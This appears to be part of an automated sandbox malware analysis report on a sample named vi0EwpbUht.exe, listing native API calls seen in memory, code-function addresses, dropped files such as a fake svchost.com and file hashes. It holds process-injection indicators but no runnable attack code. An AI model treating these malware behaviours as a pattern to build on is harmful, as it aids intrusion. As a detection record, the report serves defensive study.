          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369FCB NtReadFile,17_2_02369FCB
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,23_2_036C9910
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9860 NtQuerySystemInformation,LdrInitializeThunk,23_2_036C9860
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9FE0 NtCreateMutant,LdrInitializeThunk,23_2_036C9FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9660 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_036C9660
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C96E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_036C96E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C95D0 NtClose,LdrInitializeThunk,23_2_036C95D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9B00 NtSetValueKey,23_2_036C9B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA3B0 NtGetContextThread,23_2_036CA3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A50 NtCreateFile,23_2_036C9A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A20 NtResumeThread,23_2_036C9A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A00 NtProtectVirtualMemory,23_2_036C9A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A10 NtQuerySection,23_2_036C9A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A80 NtOpenDirectoryObject,23_2_036C9A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9950 NtQueueApcThread,23_2_036C9950
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C99D0 NtCreateProcessEx,23_2_036C99D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C99A0 NtCreateSection,23_2_036C99A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CB040 NtSuspendThread,23_2_036CB040
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9840 NtDelayExecution,23_2_036C9840
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9820 NtEnumerateKey,23_2_036C9820
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C98F0 NtReadVirtualMemory,23_2_036C98F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C98A0 NtWriteVirtualMemory,23_2_036C98A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9760 NtOpenProcess,23_2_036C9760
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA770 NtOpenThread,23_2_036CA770
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9770 NtSetInformationFile,23_2_036C9770
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9730 NtQueryVirtualMemory,23_2_036C9730
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA710 NtOpenProcessToken,23_2_036CA710
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9710 NtQueryInformationToken,23_2_036C9710
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C97A0 NtUnmapViewOfSection,23_2_036C97A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9780 NtMapViewOfSection,23_2_036C9780
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9670 NtQueryInformationProcess,23_2_036C9670
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9650 NtQueryValueKey,23_2_036C9650
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9610 NtEnumerateValueKey,23_2_036C9610
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C96D0 NtCreateKey,23_2_036C96D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9560 NtWriteFile,23_2_036C9560
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9540 NtReadFile,23_2_036C9540
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9520 NtWaitForSingleObject,23_2_036C9520
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CAD30 NtSetContextThread,23_2_036CAD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C95F0 NtQueryInformationFile,23_2_036C95F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A050 NtClose,23_2_00E8A050
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A100 NtAllocateVirtualMemory,23_2_00E8A100
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89FD0 NtReadFile,23_2_00E89FD0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F20 NtCreateFile,23_2_00E89F20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A04A NtClose,23_2_00E8A04A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89FCB NtReadFile,23_2_00E89FCB
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F74 NtCreateFile,23_2_00E89F74
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F1A NtCreateFile,23_2_00E89F1A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_004030CB
          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.comJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004046CA2_2_004046CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405FA82_2_00405FA8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041E1D73_2_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409E2B3_2_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409E303_2_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A920A83_2_00A920A8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB0903_2_009DB090
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A03_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A928EC3_2_00A928EC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9E8243_2_00A9E824
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A810023_2_00A81002
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA8303_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF9003_2_009CF900
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E41203_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A922AE3_2_00A922AE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FA2B3_2_00A7FA2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB2363_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FEBB03_2_009FEBB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E33_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FABD83_2_009FABD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A803DA3_2_00A803DA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8DBD23_2_00A8DBD2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92B283_2_00A92B28
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA3093_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAB403_2_009EAB40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A6CB4F3_2_00A6CB4F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A844963_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D841F3_2_009D841F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8D4663_2_00A8D466
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB4773_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F25813_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D823_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A925DD3_2_00A925DD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E03_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92D073_2_00A92D07
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C0D203_2_009C0D20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91D553_2_00A91D55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92EF73_2_00A92EF7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E6E303_2_009E6E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8D6163_2_00A8D616
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91FF13_2_00A91FF1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9DFCE3_2_00A9DFCE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_004010303_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041E1D73_1_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D873_1_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D903_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E2B3_1_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E303_1_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402FB03_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041E1D77_2_0041E1D7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D877_2_00402D87
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E2B7_2_00409E2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E307_2_00409E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A07_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE20A87_2_00AE20A8
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B0907_2_00A2B090
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE28EC7_2_00AE28EC
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEE8247_2_00AEE824
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A8307_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD10027_2_00AD1002
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A341207_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1F9007_2_00A1F900
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE22AE7_2_00AE22AE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ACFA2B7_2_00ACFA2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4EBB07_2_00A4EBB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD03DA7_2_00AD03DA
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADDBD27_2_00ADDBD2
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2B287_2_00AE2B28
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3AB407_2_00A3AB40
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2841F7_2_00A2841F
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD4667_2_00ADD466
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A425817_2_00A42581
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2D5E07_2_00A2D5E0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE25DD7_2_00AE25DD
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A10D207_2_00A10D20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2D077_2_00AE2D07
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1D557_2_00AE1D55
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2EF77_2_00AE2EF7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A36E307_2_00A36E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD6167_2_00ADD616
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1FF17_2_00AE1FF1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEDFCE7_2_00AEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44AEF17_2_02E44AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E522AE17_2_02E522AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E3FA2B17_2_02E3FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E323E317_2_02E323E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBABD817_2_02DBABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4DBD217_2_02E4DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E403DA17_2_02E403DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBEBB017_2_02DBEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAAB4017_2_02DAAB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52B2817_2_02E52B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA30917_2_02DAA309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E528EC17_2_02E528EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9B09017_2_02D9B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E520A817_2_02E520A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB20A017_2_02DB20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5E82417_2_02E5E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4100217_2_02E41002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA83017_2_02DAA830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA99BF17_2_02DA99BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D8F90017_2_02D8F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA412017_2_02DA4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52EF717_2_02E52EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA6E3017_2_02DA6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D61617_2_02E4D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51FF117_2_02E51FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5DFCE17_2_02E5DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4449617_2_02E44496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D46617_2_02E4D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9841F17_2_02D9841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E525DD17_2_02E525DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9D5E017_2_02D9D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB258117_2_02DB2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E42D8217_2_02E42D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51D5517_2_02E51D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52D0717_2_02E52D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D80D2017_2_02D80D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236E1D717_2_0236E1D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E3017_2_02359E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E2B17_2_02359E2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352FB017_2_02352FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D9017_2_02352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D8717_2_02352D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A336023_2_036A3360
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AAB4023_2_036AAB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372CB4F23_2_0372CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752B2823_2_03752B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA30923_2_036AA309
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374231B23_2_0374231B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036D8BE823_2_036D8BE8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037323E323_2_037323E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374DBD223_2_0374DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037403DA23_2_037403DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BABD823_2_036BABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BEBB023_2_036BEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B138B23_2_036B138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AEB9A23_2_036AEB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372EB8A23_2_0372EB8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03745A4F23_2_03745A4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0373FA2B23_2_0373FA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB23623_2_036AB236
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744AEF23_2_03744AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374E2C523_2_0374E2C5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037522AE23_2_037522AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037532A923_2_037532A9
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A412023_2_036A4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368F90023_2_0368F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369C1C023_2_0369C1C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A99BF23_2_036A99BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A299023_2_036A2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375E82423_2_0375E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA83023_2_036AA830
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368680023_2_03686800
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374100223_2_03741002
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B701D23_2_036B701D
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037460F523_2_037460F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037528EC23_2_037528EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B20A023_2_036B20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037520A823_2_037520A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369B09023_2_0369B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751FF123_2_03751FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037467E223_2_037467E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375DFCE23_2_0375DFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0370AE6023_2_0370AE60
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A6E3023_2_036A6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D61623_2_0374D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A560023_2_036A5600
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752EF723_2_03752EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B06C023_2_036B06C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03731EB623_2_03731EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751D5523_2_03751D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2D5023_2_036A2D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03680D2023_2_03680D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752D0723_2_03752D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369D5E023_2_0369D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037525DD23_2_037525DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B65A023_2_036B65A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B258123_2_036B2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03742D8223_2_03742D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374CC7723_2_0374CC77
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D46623_2_0374D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB47723_2_036AB477
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A243023_2_036A2430
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369841F23_2_0369841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B4CD423_2_036B4CD4
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374449623_2_03744496
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8E1D723_2_00E8E1D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D8723_2_00E72D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D9023_2_00E72D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E2B23_2_00E79E2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E3023_2_00E79E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72FB023_2_00E72FB0
          Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
          Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02D8B150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: String function: 0041BDA0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: String function: 009CB150 appears 136 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 036DD08C appears 48 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03715720 appears 85 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0368B150 appears 177 times
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: String function: 00A1B150 appears 54 times
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmpBinary or memory string: originalfilename vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.584995806.00000000021D0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000003.324725121.0000000003226000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000002.336317174.0000000002190000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs vi0EwpbUht.exe
